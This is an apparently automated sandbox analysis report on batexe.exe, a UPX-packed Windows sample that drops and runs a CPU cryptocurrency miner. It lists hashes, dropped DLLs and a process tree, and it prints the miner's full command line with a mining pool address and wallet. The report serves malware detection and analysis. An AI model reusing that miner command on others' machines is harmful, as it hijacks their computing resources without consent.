73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
303s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 08:28

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3216	b2e.exe
2532	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2532	cpuminer-sse2.exe
2532	cpuminer-sse2.exe
2532	cpuminer-sse2.exe
2532	cpuminer-sse2.exe
2532	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1584-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1584 wrote to memory of 3216	1584	batexe.exe	73
PID 1584 wrote to memory of 3216	1584	batexe.exe	73
PID 1584 wrote to memory of 3216	1584	batexe.exe	73
PID 3216 wrote to memory of 3024	3216	b2e.exe	74
PID 3216 wrote to memory of 3024	3216	b2e.exe	74
PID 3216 wrote to memory of 3024	3216	b2e.exe	74
PID 3024 wrote to memory of 2532	3024	cmd.exe	77
PID 3024 wrote to memory of 2532	3024	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1584
- C:\Users\Admin\AppData\Local\Temp\D1E6.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\D1E6.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D1E6.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D793.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D1E6.tmp\b2e.exe

Filesize
3.1MB

MD5
ce4a1aedf0a19c71d5ebc1e79a9c8cd7

SHA1
6ced51a37dae1ab677bedf7c74817131fa59f59f

SHA256
10578fbc72a24785f8b1801c56099a7dbb4718e83bc3171fe26f0d15f677502d

SHA512
8d0dcad0ec95b3498d57bba0defe6c18a42c661ce794f52abc5dd1ab1d4b18f3d469dc3361e408a72b8d23a71075394be74333fdc6e36731f9a012655dc2bc4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\D1E6.tmp\b2e.exe

Filesize
3.8MB

MD5
2c18eeccf0c1c22b7ad2504b27664d97

SHA1
ea29f9545a185c6b6ec98d05c1ff23c9efecb576

SHA256
59e4cc79906f1c2cfd3fdd0b8d32d151eca7cdd89cee8bbf065898eed0951685

SHA512
140a6ca0eb91d7ccef460f54d5412cd86e7a681e3358867a643931162832a9cb8bbbf07535847ef53e25326fb23f85ceb964a17ff902bdd6cd5e3acb10b6a5eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\D793.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
840KB

MD5
056889ef74e2a2f4650a5c228119812a

SHA1
d4d6285d1408050b007a21104b4a39d1d20f79bf

SHA256
375d6fb14fbad319c923e0de43106262fa6543c0a7743c87e110c912ecce49ef

SHA512
c7d5e8df0a0aaf6a5df5bb499c35e79fd98a4997d9d508249d27e98b63a81bdcbbd7f389d689918164015cb2ce8bb0f4c21666986d6b46bd87deb1369083ea5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
736KB

MD5
d1763a0ac9b6996e41d20ec9a860dc98

SHA1
6755f34107584e6229e92590dc5dc7a52b969fc3

SHA256
98251829507f4096abd8947d232880033aa6d94cc24cb68bacfc24c6f20a6d42

SHA512
e87059431d1b544d7f6bd16fffc33ee12ea5c94b0170f81644f1c92be0819068ed12f54efd5b2d2681436023aa7db9a66d46ebfee98916daaa785f0f0b970c45

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
746KB

MD5
0a4caa9dadf2137486cf24c70f6066be

SHA1
8e87c80ff9fedee3bf37725a0b3f1dc84fc96798

SHA256
f2b09e13be9c6f94b97458e6fe26d915d82a2f3c1c5ed0b9cdc90812124f934a

SHA512
25e73c97fdc8e305d780c21e6d34caba7a60cba2eceed98c39838cf41a92c4d0563abfb80fdf1754d32a812762a63dfb56e0047c57bbce96fdf1fda4b96c5087

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
691KB

MD5
7fbf37fbe48396b4888527c3e1d5f8b8

SHA1
1545f96b1df0b20ba1484e7c71e0fcda5cf35457

SHA256
8c407306a140e5284c55fa70b84c6019b9c6fac709fa0ae43c5c68aa6f099aa4

SHA512
708da84ca48dceea1812a835d93b2087417453b93bde1915dcf1835f651d4bfdf9b4f09460ea5c78b5418f9418c576022c2959268d0ea65597b24e457fd857d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
873KB

MD5
cba25dbb8e399017b21cfb22b91bdf8b

SHA1
a3ed3e6f22b8baa06b3cef30ffd2039fac6b7e5d

SHA256
7c18f63ebef457721dd980574ebf77d3d5282e176a55a3cbe362aeec710a8460

SHA512
77f3ada3280a785c2890fc1226925baba0bebc50088bf26fabd70a9dea5022af55e10ed40cfbe348e97981def960952619b22570148a695aca3ddc9659701a59

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
904KB

MD5
be610ec6dec10fdba68e97e117cacee7

SHA1
07b84cbfb7f39a2a6667955a32a606336f4830b4

SHA256
fcea8a2935d61616f47169e8201360d36846efe9b29d2e6744b94cbb46dadebc

SHA512
a659552ccc0fc795ed643a5aab36d9ca9631301088e2f613abd6e77338f6290b5d176f2ab87e57785a6f97bdcd940352966d4f623f70bc31f1294f57dce0d3f4

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
766KB

MD5
dd8c719f34b769a3d242a1b31b5b9dcb

SHA1
61768291653027055b2e674ca55f57a67b648b6d

SHA256
6c74671fa23bcd45a583e0ee408f71feeeeed4adb19bd8f2fe3683c55568dcae

SHA512
ee770c900fe15681013bc13965c9b963add9073f8d346ab91ed41efd75611a76a61dbe1c800fcdf6fe9897aecba6e2f53afb74d835e411cef982bfe6b3035dbf

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
663KB

MD5
6304fd6e8d2bf779b9b09085aa3ee36f

SHA1
3233c937319b3f03cedb35eee43885d27d44c679

SHA256
f003107a13ab0148f28ce072fdee243ef1fa2619ad1667631bd37b73aa8cea7d

SHA512
b34b8915135811960d3536530f36c06b80fd6dd358075cff8c0972a6fc8f24d28b2557e3afb452c6abd84d1247364a738697fba81e8dafd574227bc9f93c8306

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1584-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2532-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2532-43-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/2532-44-0x0000000001030000-0x00000000028E5000-memory.dmp

Filesize
24.7MB

Download
memory/2532-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2532-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3216-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3216-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download